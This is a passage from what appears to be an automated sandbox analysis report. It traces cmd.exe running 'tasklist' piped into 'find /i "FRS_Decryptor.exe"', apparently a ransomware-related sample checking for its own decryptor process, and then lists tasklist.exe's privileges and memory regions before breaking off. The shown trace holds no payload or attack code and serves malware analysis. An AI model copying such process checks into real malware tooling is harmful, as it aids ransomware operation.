[0132.803] SetErrorMode (uMode=0x1) returned 0x0 [0132.803] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xc45228, lpFilePart=0x98f9d4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x98f9d4*="Desktop") returned 0x1c [0132.803] SetErrorMode (uMode=0x0) returned 0x1 [0132.804] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.804] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.807] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.808] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.808] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x98f760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f760) returned 0xffffffff [0132.808] GetLastError () returned 0x2 [0132.808] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.808] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x98f760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f760) returned 0xc45530 [0132.808] FindClose (in: hFindFile=0xc45530 | out: hFindFile=0xc45530) returned 1 [0132.808] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x98f760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f760) returned 0xffffffff [0132.808] GetLastError () returned 0x2 [0132.808] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x98f760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f760) returned 0xc45530 [0132.809] FindClose (in: hFindFile=0xc45530 | out: hFindFile=0xc45530) returned 1 [0132.809] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.809] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.809] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0132.809] SetErrorMode (uMode=0x0) returned 0x0 [0132.809] SetErrorMode (uMode=0x1) returned 0x0 [0132.809] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xc4a3c0, lpFilePart=0x98f77c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x98f77c*="Desktop") returned 0x1c [0132.809] SetErrorMode (uMode=0x0) returned 0x1 [0132.809] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.809] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.809] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.809] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.809] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x98f508, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f508) returned 0xffffffff [0132.809] GetLastError () returned 0x2 [0132.809] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.809] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x98f508, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f508) returned 0xc45628 [0132.809] FindClose (in: hFindFile=0xc45628 | out: hFindFile=0xc45628) returned 1 [0132.810] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x98f508, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f508) returned 0xffffffff [0132.810] GetLastError () returned 0x2 [0132.810] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x98f508, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f508) returned 0xc45628 [0132.810] FindClose (in: hFindFile=0xc45628 | out: hFindFile=0xc45628) returned 1 [0132.810] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.810] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.810] GetConsoleTitleW (in: lpConsoleTitle=0x98fa04, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0132.810] InitializeProcThreadAttributeList (in: lpAttributeList=0x98f930, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x98f914 | out: lpAttributeList=0x98f930, lpSize=0x98f914) returned 1 [0132.810] UpdateProcThreadAttribute (in: lpAttributeList=0x98f930, dwFlags=0x0, Attribute=0x60001, lpValue=0x98f91c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x98f930, lpPreviousValue=0x0) returned 1 [0132.810] GetStartupInfoW (in: lpStartupInfo=0x98f968 | out: lpStartupInfo=0x98f968*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2e8, hStdError=0x2c)) [0132.810] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0132.811] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0132.811] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0132.812] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x98f8b8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x98f904 | out: lpCommandLine="tasklist", lpProcessInformation=0x98f904*(hProcess=0x64, hThread=0x60, dwProcessId=0xbac, dwThreadId=0x444)) returned 1 [0132.815] CloseHandle (hObject=0x60) returned 1 [0132.815] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.815] GetEnvironmentStringsW () returned 0xc442d8* [0132.815] FreeEnvironmentStringsA (penv="=") returned 1 [0132.815] DeleteProcThreadAttributeList (in: lpAttributeList=0x98f930 | out: lpAttributeList=0x98f930) [0132.815] _get_osfhandle (_FileHandle=3) returned 0x54 [0132.815] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0132.816] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0132.816] _close (_FileHandle=5) returned 0 [0132.816] _dup (_FileHandle=0) returned 4 [0132.816] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0132.816] _close (_FileHandle=3) returned 0 [0132.816] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0132.816] SetErrorMode (uMode=0x0) returned 0x0 [0132.816] SetErrorMode (uMode=0x1) returned 0x0 [0132.816] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xc442e0, lpFilePart=0x98f9d4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x98f9d4*="Desktop") returned 0x1c [0132.816] SetErrorMode (uMode=0x0) returned 0x1 [0132.816] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.816] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.816] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.816] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.816] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x98f760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f760) returned 0xffffffff [0132.816] GetLastError () returned 0x2 [0132.816] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.816] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x98f760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f760) returned 0xc45628 [0132.817] FindClose (in: hFindFile=0xc45628 | out: hFindFile=0xc45628) returned 1 [0132.817] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x98f760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f760) returned 0xffffffff [0132.817] GetLastError () returned 0x2 [0132.817] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x98f760, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f760) returned 0xc45628 [0132.817] FindClose (in: hFindFile=0xc45628 | out: hFindFile=0xc45628) returned 1 [0132.817] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.817] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.817] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0132.817] SetErrorMode (uMode=0x0) returned 0x0 [0132.817] SetErrorMode (uMode=0x1) returned 0x0 [0132.817] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xc44668, lpFilePart=0x98f77c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x98f77c*="Desktop") returned 0x1c [0132.817] SetErrorMode (uMode=0x0) returned 0x1 [0132.817] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.817] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0132.817] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.817] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.817] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x98f508, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f508) returned 0xffffffff [0132.818] GetLastError () returned 0x2 [0132.818] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.818] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x98f508, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f508) returned 0xc404a0 [0132.818] FindClose (in: hFindFile=0xc404a0 | out: hFindFile=0xc404a0) returned 1 [0132.818] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x98f508, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f508) returned 0xffffffff [0132.818] GetLastError () returned 0x2 [0132.818] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x98f508, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x98f508) returned 0xc404a0 [0132.818] FindClose (in: hFindFile=0xc404a0 | out: hFindFile=0xc404a0) returned 1 [0132.818] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0132.818] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0132.818] GetConsoleTitleW (in: lpConsoleTitle=0x98fa04, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0132.818] InitializeProcThreadAttributeList (in: lpAttributeList=0x98f930, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x98f914 | out: lpAttributeList=0x98f930, lpSize=0x98f914) returned 1 [0132.818] UpdateProcThreadAttribute (in: lpAttributeList=0x98f930, dwFlags=0x0, Attribute=0x60001, lpValue=0x98f91c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x98f930, lpPreviousValue=0x0) returned 1 [0132.818] GetStartupInfoW (in: lpStartupInfo=0x98f968 | out: lpStartupInfo=0x98f968*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x2e8, hStdError=0x2c)) [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0132.819] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0132.819] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0132.819] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x98f8b8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x98f904 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x98f904*(hProcess=0x60, hThread=0x54, dwProcessId=0xbbc, dwThreadId=0x81c)) returned 1 [0132.822] CloseHandle (hObject=0x54) returned 1 [0132.822] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.822] GetEnvironmentStringsW () returned 0xc4ad78* [0132.822] FreeEnvironmentStringsA (penv="=") returned 1 [0132.822] DeleteProcThreadAttributeList (in: lpAttributeList=0x98f930 | out: lpAttributeList=0x98f930) [0132.822] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0132.822] _close (_FileHandle=4) returned 0 [0132.822] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0133.295] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x98fc78 | out: lpExitCode=0x98fc78*=0x0) returned 1 [0133.295] CloseHandle (hObject=0x64) returned 1 [0133.295] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0133.297] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x98fc78 | out: lpExitCode=0x98fc78*=0x0) returned 1 [0133.297] CloseHandle (hObject=0x60) returned 1 [0133.297] _get_osfhandle (_FileHandle=1) returned 0x2e8 [0133.297] SetConsoleMode (hConsoleHandle=0x2e8, dwMode=0x0) returned 0 [0133.297] _get_osfhandle (_FileHandle=1) returned 0x2e8 [0133.297] GetConsoleMode (in: hConsoleHandle=0x2e8, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0133.297] _get_osfhandle (_FileHandle=0) returned 0x24 [0133.297] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0133.297] SetConsoleInputExeNameW () returned 0x1 [0133.297] GetConsoleOutputCP () returned 0x1b5 [0133.297] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0133.297] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.297] exit (_Code=0) Process: id = "144" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x124f4000" os_pid = "0xbac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "143" os_parent_pid = "0x5e8" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7409 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 7410 start_va = 0x280000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7411 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 7412 start_va = 0x2b0000 end_va = 0x2befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 7413 start_va = 0x2c0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 7414 start_va = 0x300000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 7415 start_va = 0x340000 end_va = 0x343fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 7416 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 7417 start_va = 0x360000 end_va = 0x361fff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 7418 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7419 start_va = 0x7e800000 end_va = 0x7e822fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e800000" filename = "" Region: id = 7420 start_va = 0x7e824000 end_va = 0x7e824fff entry_point = 0x0 region_type = private name = "private_0x000000007e824000" filename = "" Region: id = 7421 start_va = 0x7e826000 end_va = 0x7e826fff entry_point = 0x0 region_type = private name = "private_0x000000007e826000" filename = "" Region: id = 7422 start_va = 0x7e82d000 end_va = 0x7e82ffff entry_point = 0x0 region_type = private name = 